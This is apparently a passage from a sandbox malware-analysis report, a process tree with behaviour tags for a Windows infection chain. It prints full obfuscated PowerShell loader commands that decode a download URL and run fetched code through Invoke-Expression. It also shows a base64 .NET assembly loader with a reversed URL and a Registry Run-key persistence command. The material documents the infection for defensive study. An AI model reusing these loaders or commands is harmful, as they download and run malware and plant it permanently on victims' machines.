$imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.wxyam/araz/gro.ecneicslanoitapuccoj//:sptth' , '1' , 'C:\ProgramData\' , 'decaprotia','RegAsm',''))} }"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1424

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\decaprotia.vbs"
4⤵
PID:2404

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Checks computer location settings
- Drops startup file
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1924

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xxaaqc.vbe"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1880

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Firhjulede47='Sub';$Firhjulede47+='strin';$Lnarbejderne = 1;$Firhjulede47+='g';Function Cremerne($Barnefaderens){$Regretfully177=$Barnefaderens.Length-$Lnarbejderne;For($Oreodontine=5;$Oreodontine -lt $Regretfully177;$Oreodontine+=6){$Nazeranna+=$Barnefaderens.$Firhjulede47.Invoke( $Oreodontine, $Lnarbejderne);}$Nazeranna;}function belejlige($Foreleg){. ($omdiskuteret) ($Foreleg);}$Krmmerhuse=Cremerne ' MiniMAgoraoTuri zPressiFore lSerinlbino.ae ang/Macro5Worde.Mulig0Decri Nynaz(GuttuWSamlei S.iknpse dd Li,eoSubjewHrerssSente Str.NSalgsTAd.pr M,ni1Subfi0 Bibe.Bourr0Mo,ig;Lderb .redeW PostiAarrinKaram6multi4 hand; At,a draxsving6 S,il4Shahp;Duppe LazarrShellvS leh:Blesa1Friha2Co,nb1Socia.Syste0Risen)Tearj EntopGGlas.eHo decReex.k CalaoHelta/Tille2Sl un0Emehv1I ddr0Unwin0Menom1Illim0 Anti1Desub FormaFAnhydiEks rrSk,ideRv.skfAppreoUdpinx.eter/flids1Tandb2Lejer1Slave.Blama0Cykli ';$Insectival=Cremerne ' BeatU DennsN tideTeksbrmicro- etlaAWhinig b.gneGrinenBibelt Gast ';$fairylike=Cremerne 'BrusehOn netScur,tGan ep Amats Leth:Ortyg/ Lo a/SuperjUnmanoInfikcRensecF,ertuHex npVirknaMatert,ycamiForhaoDahoonTankeaOpkallo.tvis eronc erfoiBeckseilen,n YnglcInrigePreli.Svineotho wrKontogPassa/ iolezPaddlaFinanrH.lpeaEmbai/PragtGFarvelPunchoTilremFordmeBoligr overuPatril Stomi.ortatprideiStrygsChymi.HemmedKra leMinimpTur,ylIslamoArchayDicki ';$Thage=Cremerne 'Unfri>.liss ';$omdiskuteret=Cremerne ' dpegi CutaeBetj,x ddit ';$Tattie='Udbredelsesomraader';$Flovserne = Cremerne 'UnmeleCompacDitikhUds.roGenin Toeli%DunhiaConcepTillipchalcdFoderabil.etUranoaBrand%Invo,\Rhi oSUmulioFolkerOversbSkdese Men.tBabel.D.limUBlocknParadbBruge Half&Pingu&Uindb .hirteCon icFednihGandeoCant OghatOprin ';belejlige (Cremerne ' Krav$ Hopeg akalIncl.opes,ibKlkniaNonsilSiren:DrakbpUsikkrHyperoToelivDmoneoS,rukkGamina HypetSt derSha e=Areng(sherecRiotem BelvdPr va Disk/StenfcKo,ge ,ocki$ElektFChr,mlNsehooDebowvFaradsAssi,eC orerSka,tnI,ddreOvers) Prof ');belejlige (Cremerne ' Ste,$Slv,ng .epalKl edoArranbImagoaRefutlEpigr:Ska lS Ch,rttmm.racyanoi .fferHematcaubepaSqua sBaskeeUdsyrsgu.ra=Produ$DibblfBesn.aReil.iNoninrPauliyB,somlBrig i.uropkTappee,enzi. tags Ta.rp,nhaulSwathiVernot orig(Cruel$ SpalTTabelhSipsba.vedjgKniveeRitua)Missi ');$fairylike=$Staircases[0];$bestyrelsesreferaterne= (Cremerne 'Dekl,$hjlp.gUnpeclUdkmpoDe erb uperaFo.vilSyn.s:Fa.ceUTopfonFlan c,tartuCava r .olibMe.th=CyrilNFlj,reOospowJirin-DisanOMitogbU.derjGtraneKilotcdam.rtDi.ta ResiS S.ovyPostisUnsugtPreabeFjerdm.karl. orbeN In lePr.rotBorgm.Cod,rW ImpeeH llibSelskCUn.erlI,variKrakeeBlindnA erat');$bestyrelsesreferaterne+=$provokatr[1];belejlige ($bestyrelsesreferaterne);belejlige (Cremerne 'resun$preamUElectn ParecScrapuTillgr evisbPerso..nderHSammee Hud,a No.cd .ilje TiccrBl,nisMorsi[afspn$NonfuIbaladnExtrasImpoveTranscEftert.largiRecanvUndera BrullWri.t]styrt=Bagst$De.isKOparerSpiramGolasmAllokeHektorPrebih VoicuAnnu.sUdrugePers ');$Nykkes=Cremerne 'Sandg$KbtesUPreponJaloucBew au BogbrRecitbpharm.Loai DNdl.noMediawBekennSem el.ngoroMolybaBrigadUd,ryF.luigi NarklAmpaneOverf( unmi$R klafHelioaRein,iFosforFarray seholm.spui T.lsk,oursexerog,L,opo$ krifgHauntl parao embebSubdoaProsplO lysiVampesUds.raEpilat FootiDatoloParaln Emp,sEkvip) Sla, ';$globalisations=$provokatr[0];belejlige (Cremerne '.aris$Sceneg S btlLrerkoF.yvebNormaaMo,gelBind,:GravsbPensieNorm,lGibboiChlorz Retoe SorgrUdhvne ldri=Varme(AlurrTIndfaeGallis CoactBl as-Su,alPHamesaUndert AffrhFe,lb Tidsg$ MosagRevinlIntraoEfterbIoni.aCallelForbriM rtgsS.abha Derit aabsiCon ioFaithnJadeisGaffe)S.rot ');while (!$belizere) {belejlige (Cremerne ' .and$TubipgMeaselPopulo Sy,tbAto,laDig,al Va.n: biscCG leroC anhnLang fEdgebi Kj sdErythe BhunrBrn k=Frbid$Coupat Chror Re,ouNivaleHet,r ') ;belejlige $Nykkes;belejlige (Cremerne 'InterSHomontplaceaVi.rarGara,t ,ett-AandeS TyktlSkaereF.rileDefinpRaffi H,gbu4Shall ');belejlige (Cremerne ',irak$RecabgPreeplB,ainoEmig b.nteraDre,alUnscu:Inds,bWareseR ceplAlb,niBlattzAlumieSc,olr gen.eBucol= St,r(K,loaTFljteeB,yggsAvoditPillo-MultiPFrydea AmagtCyanshbruge Torta$NondegTa ajlSt.neoUns,sbBr,ncamangal dleji Pa esShaf,aAletatTvegei Ad ioHer.tn TilmsRes,s)Kaste ') ;belejlige (Cremerne 'Toyli$ TwadgUngo.lbeg eoPhlo,b DiffaSik elEne.g:Race oAgterpterris ForslFolkeaLocutaTime =Pala.$FotoggAnanalkedeloScenebMoab aArvellInver:P.ecoJMeno uSin,sbbl.tti Protlmis,auPurlimM ljtsGurramBl,dtiMogv,dDrumbdTyndeas,enegReligeRegrenDrepasUopmr+Butik+Ackno% kern$Mch,gSChryst,idegaEmanuiMankirBerascopstrask.drs UdtreGavnls Syst.Nicolc.armkoKura,uAl trnrekurt Suff ') ;$fairylike=$Staircases[$opslaa];}$skriftsnit=294679;$Pomeransskal=27677;belejlige (Cremerne 'Rinki$Funktg BuntlHoldioPudibbNum,ea Di plLevem:SilicVAppanaArbe,g Partt arsm hirdeStaklsSkomatUnadje sller Atri ema=Overg eimbGudtyderichmt harr-BromoC Ka aoImprinWandltU.ganeLuf knVi totTidsp For.n$Unde.g Bed,lConfioRe,edbSubliaTagenlMa keiRgte ssel.maOphictPreceiInigooH.lshnEnkels Tres ');belejlige (Cremerne 'Uigen$UlkengSt erlE.hveoVeks.bNemala Supel tolt: MennRT iche C.unfDiagoe Spart Astre orr Aechm=Flags Megap[Kupo.S arjoyMondes PristTermieDeplam .lad.WiltoCKultuoReb unImprev.ykkeeTfteerDysfutCoshe]Comps:Sansc:unbu FTimefrMundioI framDomi BUngyra Indfs Fluoe Dism6Peach4umrkeSLikv tLandgrLo,taiorgannFlad gTamme(.arad$RundkVEneinaW,orrg TotatBlaasm oykoeSwazis,hrontRegraege dir kste)Anal. ');belejlige (Cremerne 'Lnest$TrumpgCaraml.roncoPervebDagg,aOrdkllAfrej:BrnefUPesosnEr kkeGrovexhypobpSupereIngegd Fli,iBeaujeTovrenTimort ArkflValgpyHofde3produ Chole= Pla, .inis[ReestSMona,yOverss ioskt SysseSkjtemUland.GoliaTGritteLept.xPap,rtTe,tl. TilbEConvenBatinccalopoPygmydWart,i RestnCrategVampe]Vagst: Epis:TyranAUrethSTotalC BrobI iogrI Nonp. TegnGUd,tae dekatAdenaS UnbutSigjnrHypofiSubsenPraksgGrusg(Fo.ko$lingbRBimeteHyperf FrndeAkadetSkamseErkla)Malis ');belejlige (Cremerne ' Moto$ShawlgCon alP ndioOpiumbKorthaPy.nilSitti:Mome UGdninntriakc,nnemeFlovmrSrilatT,gheiTudehfKandiiL mpwaalkydbStandlLotuseHulkolBlselyUndew=In us$ungagUSpinknThaiseCineaxhyre.pUdpoleO.ervdinteli Arrhe Dek.nLatentD.apelAstroy Ran 3stuep.SymptsPiezouFeateb TangsMickyt Satar LongiEnf.en D.neginvol(Phila$StedssDelmnkDeli,r ClamiAc nefbundstKultusFormun LazaiTes.etPensi,Bling$slgtsP FingoBrudemskelseFr.garPr,poaComp,nK leys StersPicomkL assa OptalVi.ef)Micro ');belejlige $Uncertifiablely;"
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3500

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sorbet.Unb && echo t"
7⤵
PID:4400

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Firhjulede47='Sub';$Firhjulede47+='strin';$Lnarbejderne = 1;$Firhjulede47+='g';Function Cremerne($Barnefaderens){$Regretfully177=$Barnefaderens.Length-$Lnarbejderne;For($Oreodontine=5;$Oreodontine -lt $Regretfully177;$Oreodontine+=6){$Nazeranna+=$Barnefaderens.$Firhjulede47.Invoke( $Oreodontine, $Lnarbejderne);}$Nazeranna;}function belejlige($Foreleg){. ($omdiskuteret) ($Foreleg);}$Krmmerhuse=Cremerne ' MiniMAgoraoTuri zPressiFore lSerinlbino.ae ang/Macro5Worde.Mulig0Decri Nynaz(GuttuWSamlei S.iknpse dd Li,eoSubjewHrerssSente Str.NSalgsTAd.pr M,ni1Subfi0 Bibe.Bourr0Mo,ig;Lderb .redeW PostiAarrinKaram6multi4 hand; At,a draxsving6 S,il4Shahp;Duppe LazarrShellvS leh:Blesa1Friha2Co,nb1Socia.Syste0Risen)Tearj EntopGGlas.eHo decReex.k CalaoHelta/Tille2Sl un0Emehv1I ddr0Unwin0Menom1Illim0 Anti1Desub FormaFAnhydiEks rrSk,ideRv.skfAppreoUdpinx.eter/flids1Tandb2Lejer1Slave.Blama0Cykli ';$Insectival=Cremerne ' BeatU DennsN tideTeksbrmicro- etlaAWhinig b.gneGrinenBibelt Gast ';$fairylike=Cremerne 'BrusehOn netScur,tGan ep Amats Leth:Ortyg/ Lo a/SuperjUnmanoInfikcRensecF,ertuHex npVirknaMatert,ycamiForhaoDahoonTankeaOpkallo.tvis eronc erfoiBeckseilen,n YnglcInrigePreli.Svineotho wrKontogPassa/ iolezPaddlaFinanrH.lpeaEmbai/PragtGFarvelPunchoTilremFordmeBoligr overuPatril Stomi.ortatprideiStrygsChymi.HemmedKra leMinimpTur,ylIslamoArchayDicki ';$Thage=Cremerne 'Unfri>.liss ';$omdiskuteret=Cremerne ' dpegi CutaeBetj,x ddit ';$Tattie='Udbredelsesomraader';$Flovserne = Cremerne 'UnmeleCompacDitikhUds.roGenin Toeli%DunhiaConcepTillipchalcdFoderabil.etUranoaBrand%Invo,\Rhi oSUmulioFolkerOversbSkdese Men.tBabel.D.limUBlocknParadbBruge Half&Pingu&Uindb .hirteCon icFednihGandeoCant OghatOprin ';belejlige (Cremerne ' Krav$ Hopeg akalIncl.opes,ibKlkniaNonsilSiren:DrakbpUsikkrHyperoToelivDmoneoS,rukkGamina HypetSt derSha e=Areng(sherecRiotem BelvdPr va Disk/StenfcKo,ge ,ocki$ElektFChr,mlNsehooDebowvFaradsAssi,eC orerSka,tnI,ddreOvers) Prof ');belejlige (Cremerne ' Ste,$Slv,ng .epalKl edoArranbImagoaRefutlEpigr:Ska lS Ch,rttmm.racyanoi .fferHematcaubepaSqua sBaskeeUdsyrsgu.ra=Produ$DibblfBesn.aReil.iNoninrPauliyB,somlBrig i.uropkTappee,enzi. tags Ta.rp,nhaulSwathiVernot orig(Cruel$ SpalTTabelhSipsba.vedjgKniveeRitua)Missi ');$fairylike=$Staircases[0];$bestyrelsesreferaterne= (Cremerne 'Dekl,$hjlp.gUnpeclUdkmpoDe erb uperaFo.vilSyn.s:Fa.ceUTopfonFlan c,tartuCava r .olibMe.th=CyrilNFlj,reOospowJirin-DisanOMitogbU.derjGtraneKilotcdam.rtDi.ta ResiS S.ovyPostisUnsugtPreabeFjerdm.karl. orbeN In lePr.rotBorgm.Cod,rW ImpeeH llibSelskCUn.erlI,variKrakeeBlindnA erat');$bestyrelsesreferaterne+=$provokatr[1];belejlige ($bestyrelsesreferaterne);belejlige (Cremerne 'resun$preamUElectn ParecScrapuTillgr evisbPerso..nderHSammee Hud,a No.cd .ilje TiccrBl,nisMorsi[afspn$NonfuIbaladnExtrasImpoveTranscEftert.largiRecanvUndera BrullWri.t]styrt=Bagst$De.isKOparerSpiramGolasmAllokeHektorPrebih VoicuAnnu.sUdrugePers ');$Nykkes=Cremerne 'Sandg$KbtesUPreponJaloucBew au BogbrRecitbpharm.Loai DNdl.noMediawBekennSem el.ngoroMolybaBrigadUd,ryF.luigi NarklAmpaneOverf( unmi$R klafHelioaRein,iFosforFarray seholm.spui T.lsk,oursexerog,L,opo$ krifgHauntl parao embebSubdoaProsplO lysiVampesUds.raEpilat FootiDatoloParaln Emp,sEkvip) Sla, ';$globalisations=$provokatr[0];belejlige (Cremerne '.aris$Sceneg S btlLrerkoF.yvebNormaaMo,gelBind,:GravsbPensieNorm,lGibboiChlorz Retoe SorgrUdhvne ldri=Varme(AlurrTIndfaeGallis CoactBl as-Su,alPHamesaUndert AffrhFe,lb Tidsg$ MosagRevinlIntraoEfterbIoni.aCallelForbriM rtgsS.abha Derit aabsiCon ioFaithnJadeisGaffe)S.rot ');while (!$belizere) {belejlige (Cremerne ' .and$TubipgMeaselPopulo Sy,tbAto,laDig,al Va.n: biscCG leroC anhnLang fEdgebi Kj sdErythe BhunrBrn k=Frbid$Coupat Chror Re,ouNivaleHet,r ') ;belejlige $Nykkes;belejlige (Cremerne 'InterSHomontplaceaVi.rarGara,t ,ett-AandeS TyktlSkaereF.rileDefinpRaffi H,gbu4Shall ');belejlige (Cremerne ',irak$RecabgPreeplB,ainoEmig b.nteraDre,alUnscu:Inds,bWareseR ceplAlb,niBlattzAlumieSc,olr gen.eBucol= St,r(K,loaTFljteeB,yggsAvoditPillo-MultiPFrydea AmagtCyanshbruge Torta$NondegTa ajlSt.neoUns,sbBr,ncamangal dleji Pa esShaf,aAletatTvegei Ad ioHer.tn TilmsRes,s)Kaste ') ;belejlige (Cremerne 'Toyli$ TwadgUngo.lbeg eoPhlo,b DiffaSik elEne.g:Race oAgterpterris ForslFolkeaLocutaTime =Pala.$FotoggAnanalkedeloScenebMoab aArvellInver:P.ecoJMeno uSin,sbbl.tti Protlmis,auPurlimM ljtsGurramBl,dtiMogv,dDrumbdTyndeas,enegReligeRegrenDrepasUopmr+Butik+Ackno% kern$Mch,gSChryst,idegaEmanuiMankirBerascopstrask.drs UdtreGavnls Syst.Nicolc.armkoKura,uAl trnrekurt Suff ') ;$fairylike=$Staircases[$opslaa];}$skriftsnit=294679;$Pomeransskal=27677;belejlige (Cremerne 'Rinki$Funktg BuntlHoldioPudibbNum,ea Di plLevem:SilicVAppanaArbe,g Partt arsm hirdeStaklsSkomatUnadje sller Atri ema=Overg eimbGudtyderichmt harr-BromoC Ka aoImprinWandltU.ganeLuf knVi totTidsp For.n$Unde.g Bed,lConfioRe,edbSubliaTagenlMa keiRgte ssel.maOphictPreceiInigooH.lshnEnkels Tres ');belejlige (Cremerne 'Uigen$UlkengSt erlE.hveoVeks.bNemala Supel tolt: MennRT iche C.unfDiagoe Spart Astre orr Aechm=Flags Megap[Kupo.S arjoyMondes PristTermieDeplam .lad.WiltoCKultuoReb unImprev.ykkeeTfteerDysfutCoshe]Comps:Sansc:unbu FTimefrMundioI framDomi BUngyra Indfs Fluoe Dism6Peach4umrkeSLikv tLandgrLo,taiorgannFlad gTamme(.arad$RundkVEneinaW,orrg TotatBlaasm oykoeSwazis,hrontRegraege dir kste)Anal. ');belejlige (Cremerne 'Lnest$TrumpgCaraml.roncoPervebDagg,aOrdkllAfrej:BrnefUPesosnEr kkeGrovexhypobpSupereIngegd Fli,iBeaujeTovrenTimort ArkflValgpyHofde3produ Chole= Pla, .inis[ReestSMona,yOverss ioskt SysseSkjtemUland.GoliaTGritteLept.xPap,rtTe,tl. TilbEConvenBatinccalopoPygmydWart,i RestnCrategVampe]Vagst: Epis:TyranAUrethSTotalC BrobI iogrI Nonp. TegnGUd,tae dekatAdenaS UnbutSigjnrHypofiSubsenPraksgGrusg(Fo.ko$lingbRBimeteHyperf FrndeAkadetSkamseErkla)Malis ');belejlige (Cremerne ' Moto$ShawlgCon alP ndioOpiumbKorthaPy.nilSitti:Mome UGdninntriakc,nnemeFlovmrSrilatT,gheiTudehfKandiiL mpwaalkydbStandlLotuseHulkolBlselyUndew=In us$ungagUSpinknThaiseCineaxhyre.pUdpoleO.ervdinteli Arrhe Dek.nLatentD.apelAstroy Ran 3stuep.SymptsPiezouFeateb TangsMickyt Satar LongiEnf.en D.neginvol(Phila$StedssDelmnkDeli,r ClamiAc nefbundstKultusFormun LazaiTes.etPensi,Bling$slgtsP FingoBrudemskelseFr.garPr,poaComp,nK leys StersPicomkL assa OptalVi.ef)Micro ');belejlige $Uncertifiablely;"
7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2544

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sorbet.Unb && echo t"
8⤵
PID:2932

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
8⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2096

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%ambuscades% -w 1 $Quantized202=(Get-ItemProperty -Path 'HKCU:\Nordmanden\').Guldstole;%ambuscades% ($Quantized202)"
9⤵
- Suspicious use of WriteProcessMemory
PID:1352

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%ambuscades% -w 1 $Quantized202=(Get-ItemProperty -Path 'HKCU:\Nordmanden\').Guldstole;%ambuscades% ($Quantized202)"
10⤵
- Adds Run key to start application
- Modifies registry key
PID:3760

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\rwvjaa.vbe"
9⤵
- Checks computer location settings
PID:5652

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Sawneb='Sub';$Sawneb+='strin';$Delfinarium97 = 1;$Sawneb+='g';Function nosologies($Presignify){$Elvrksarbejdere=$Presignify.Length-$Delfinarium97;For($Ludbehandlendes=5;$Ludbehandlendes -lt $Elvrksarbejdere;$Ludbehandlendes+=6){$Kombifilter+=$Presignify.$Sawneb.Invoke( $Ludbehandlendes, $Delfinarium97);}$Kombifilter;}function Lrerkollegierne($Pingvinernes){. ($Nabosprog) ($Pingvinernes);}$Autotelic105=nosologies ' PseuMPalomostvnizJehjdiDysphl TofalRegneaDisp,/Perip5Lysso.Ran.a0Subu. Drill(UdlejWNajeriFrokonPrkend Phleo ommuwStyllsParkg gn toNL.ditT Lava Casa1forfr0 Urre.Unlac0glend;Gloss EpsilWpig.biFormknApiol6Sakka4,ntro;Adorn UstabxEstim6Antir4S.orh; Gums GenbrrTransv Net.:Twop 1 Psa,2Lands1Virks.Beb.e0Nonex) Adol AcquiGDepope ou.pcReorik UvejoTjrin/Moral2Blast0Overf1Bogen0ha,mo0.rsal1,teuc0Skraa1Subci skravFNidiniCar.arNdrineEnamsfMelanoNordexSe ti/Zygad1Hydro2 B un1 Bej,.B.der0 Apht ';$uninoculable=nosologies 'JoyceU Sk fsWas,ieSkindrWodge-AntheApostpgEle teQuavinSejt,tPer,t ';$kammermusikken=nosologies ' SpechSammetLivestMaarep CarisFjerk: Acar/Aer,g/unifot KoncaskabetTrontspaafueNorthl Ta.feEntrec ncurt.anutrTransorin,onInstai InkocOu,susBaade. ncoucKongeoUnbur.ContizO,tflwTabul/Br,basStavndRegel/Un,erTVelr r Speco SerpmSpeaklUnreteAnginrMilhaeAandlv ImmeoSdc.llSubprvCoxaleSocierNondeeH,lmlsViole.HundrctelessBa.ebvManu ';$Roomette=nosologies 'U der>Sakk. ';$Nabosprog=nosologies 'In,ohi PorpePleurx Cess ';$Fldebollernes='osteomatoid';$Forborne = nosologies 'PerosePlanlcNoctih .namotorn, M.us%MilieaFortrp ourbpArmozdSammea VagttBor.tama,eg%Tilpl\FondsIHovednSucc,dununit MoneaEastes.useutApiosnPrferiAekvinFarc,gsvinge VivirGe.tunWateres ripsHersk.a tioV De.aoDivisiS.xmi Retra& Tave& wolf Landse Disccrungeh k rmo,enop SarditNoedv ';Lrerkollegierne (nosologies 'Overh$SoldagSt,ealNiggloAc.rebSits aVesi.lmonot:PygalCArealiCorrit,okolrCel.doErstan B rtmTilpleImmanlFondeiAnmrksAdiposChakoe F llnCongr=Koers(.lkalcMyttemOpfredTre t Teleg/ UngkcN nas Pr.re$UnderFE.plioAkt orTyrosb .isuoPlanlrHete.nUdueleA.oli)Sters ');Lrerkollegierne (nosologies 'galge$H lhegTriadlKee,aoS.bmab Su eaJenlgl Pure:Stvs,F DolkiSn,reg Pe,pu Antir litulTrofuiIn stgSpro,tFulds=Kaffe$UnthrkVversaM.kromMuddemSi,kee RumfrOpbevmBevbnuSameksFdep.i.erkokCymrik KataeTransnm,tal.,edgisPhotopForkylPhariibrynjtIndse(ammon$ InddRBou,co Overo Sp,lm E.ineU.iastAlt,rtPhonoe hund)Proce ');$kammermusikken=$Figurligt[0];$Billedhugger= (nosologies 'Espen$Troubg rtygl fvejoEff cb CabuaTrofflLacte:IndvaB OutsaSnvler PreaiPr.colD ivalOve.paBrndp=BretwN omlseBenedw.arak- .tarOBra.nb tancjHoodle Boatc Un etStuds rupSTaaley Eks s TonattowereSprinm D ff.M.nelN Tinge S.iltTilsp. GesaWUdlaaeMa hibB.rupCLejlillageriLeveleMinernAss rt');$Billedhugger+=$Citronmelissen[1];Lrerkollegierne ($Billedhugger);Lrerkollegierne (nosologies 'Skr,t$CuriuB FlipaPanderBubaliCavialKo belBlussa,itho.StrneHP,ecueStu,eathorod.verpeFe.ltr.aleosblens[Inter$Cyke,uKnibtnStdtviGn,tonMaralo.accac GriluHenr.l Lo.aa xsebs vbol bsceeChan,]K.nfe=Serra$Bo,siARe,rguOverstPsychoBagflt HampeAdminlbudgeiI,ealcGate,1Cup.e0Havar5 Enta ');$Gentlemanliness=nosologies ' Spor$AuricBSold,a G,ckrS oroiLachrlCitatlInteraFrem,. ErhvDModeroSkaktwS.lfonDouchlLol hoKelpsaEpiled n,nlF popkiMarmolUnmumeAntim(Disin$Tipsfk ,neqaWavenmUbeskmDyreheSv,gerTroldmBetalu ukas b,roi DrookA komk,ordoeErstan,onre,Grund$Myr hRSku de ,staeShabbcGuarnhImporoTro s)Dolkt ';$Reecho=$Citronmelissen[0];Lrerkollegierne (nosologies ' Uden$G,stugFodrilStadsoForsybAfst,aDrosllCapuc:UnsubNTurnoycensubPrecorImmatu Redod KarldVoldeeOcclunSysteeDeuto1L,ach3 Morp2Pheny= D kk( FaasTHoroseCaceisMiasmt ppro- eellPFanmaaCionitStillhAmano uram $FikssRArthreBybuselysvacHete,hEuro,o.efra) Ende ');while (!$Nybruddene132) {Lrerkollegierne (nosologies 'Nvenp$Miilig,ostslRu.eio Uns bIndmaa P.ptlPr.ve:OutbrWhydr,e SerisBrutts Tur eImparlAnden=Nonse$Aftegt FluerGn llu biaueS,rve ') ;Lrerkollegierne $Gentlemanliness;Lrerkollegierne (nosologies 'SkovbSSemimtForpaaPosserAp,mitTuber-DemagSStegolOveroeHetereMelonpNrved mai.f4Notat ');Lrerkollegierne (nosologies 'Misba$Emb lg nlilVelf oTr.vrbKonfeaAyahalWorsh:NonsuNMaskiyTarifbtrapprS nituEpicodHukkedBarnae LandnChroneMo.or1 P nk3 pock2 Lata=genn ( trilTFlosneSekr sFremvtAte o-SlrinPDossyaA.teetRegiohGa.eo A tio$ Sa,iRLach,eS ileeMisapcGomuthSociooEst,b)Bo,tl ') ;Lrerkollegierne (nosologies 'Depor$D mingBa dul PereoEksp,bTeknoa Menol Ekse:divinAK.ndikFolket SkuliRenseeBrn,taMangfvo,tthaRe,ivnOblonc QuineSniver UnadnTapeteUngli=Absol$ eazgSoloslForsvoVis.abMikkiaPredolElmie:AphesI rdgrnMikelv,ssoci BlactBroddeLaina+Febru+ ,erl% Opla$OrdreFtilbyiM.ltigHandeuPrecorversalB.arbiSp,ydgBaventHe.al. Skruc.manuoCoosiuRefu nEtiketC mot ') ;$kammermusikken=$Figurligt[$Aktieavancerne];}$unembowered=292446;$Nonprosperously=29824;Lrerkollegierne (nosologies ' ,ilj$Antiig N nmlSpanco urtib.rvyeaIndtelFrute: ToxiDZerotiHy.rof T.aitBenmeoRifisnUnt egFortheLitzir K ureOrdre ,kuau=Dry,t conciG Unsue osehtEn.ou-CatecCKalveoiso onAnsart StaveaxtrenFlumatbimas ribo$VrktjRRealkeUnf.meFlidec EksthAmlonoSpi.e ');Lrerkollegierne (nosologies ' Ste.$Ly,regAdmitl Chaso WaulbMyeloa.eroslSjals:C,rcuB,rdeieS aresDrfyliLoesngSprydtHenaaiWelshgPaadmePanthlSyntosLirate Nrahn Bhag Trekv=Klode Skues[ CoccSCarpoyS,onss crimtAmalgeFreebmCurso.PhotoCPrio oFrisrnVandkvStrane K itr UnwrtEldor]S ile: O.ci:SuperFstykerLydbgoSmalnmRe.raBNachgaTynd s,uleeeKa.ed6lus e4SemidSPe get anc,r TheriNewfonFilifgRaadh(Pa an$RecarDMicroiAf,oefSystetAfsteoDiplon ForbgMinareI.perrBeatgeVelve)Asbes ');Lrerkollegierne (nosologies 'Snigm$AfvangLute.lCrayoo .verb MuleaG amolBar.e:Lyse.CSco,ehVipsteBroenmDusiniRapa lTraceurappem SalgiBrevsnNonaueFry.ssForurc EngreD quen heetUnwar Reseq=Lapp Incit[ StedSBlodpyPrimesPle,etSyllaeRamarmAutom.cor eTMoraleAc.uaxNo cotA.jud.PurliECel,in tabec .ormo tru.ddeteriHindrn velsgUnton]Velig:Zelin:Rast,AExpatS BetoCDacr ITackiIBrnek. RecoG F lseAlloct asteS PlagtMilitrMerkaiJernanWeedlg Ove.( Eval$EnlayBLandoeParafs Volci HjemgWit.ot SteliS.inggrenteeUhenslStudisF,mbreNoternBesyn)Vascu ');Lrerkollegierne (nosologies 'arrak$ YellgStonelBrainovr,epb DanmaSto el Klip: K.ltSCalcatUige.aW oretVinkooJensps tr,cpThorno BromrTon.ae .vad=Waste$,iannCSkrmth,onsueryghvmIndskiThalalbryggu ompumThuriiTrietn LongeIndflsprestc,lmaheHermenMusdot Bahr.frugtsHypoauDeflab ChapsInfortApicir Hus,idispinOrddegParab(Efte.$ SpiruUnbefnDiscre HypemConsib.andloNonpawDampnef,rmar,ithyeKommedUford, siem$piperNForm oAfp,vnBuc,fpThonfr WintogrievsPopulp ElfleUndusrForldo CanouPsykos sen lInddayUdskr)Regas ');Lrerkollegierne $Statospore;"
10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:7164

C:\Windows\SysWOW64\cmd.exe
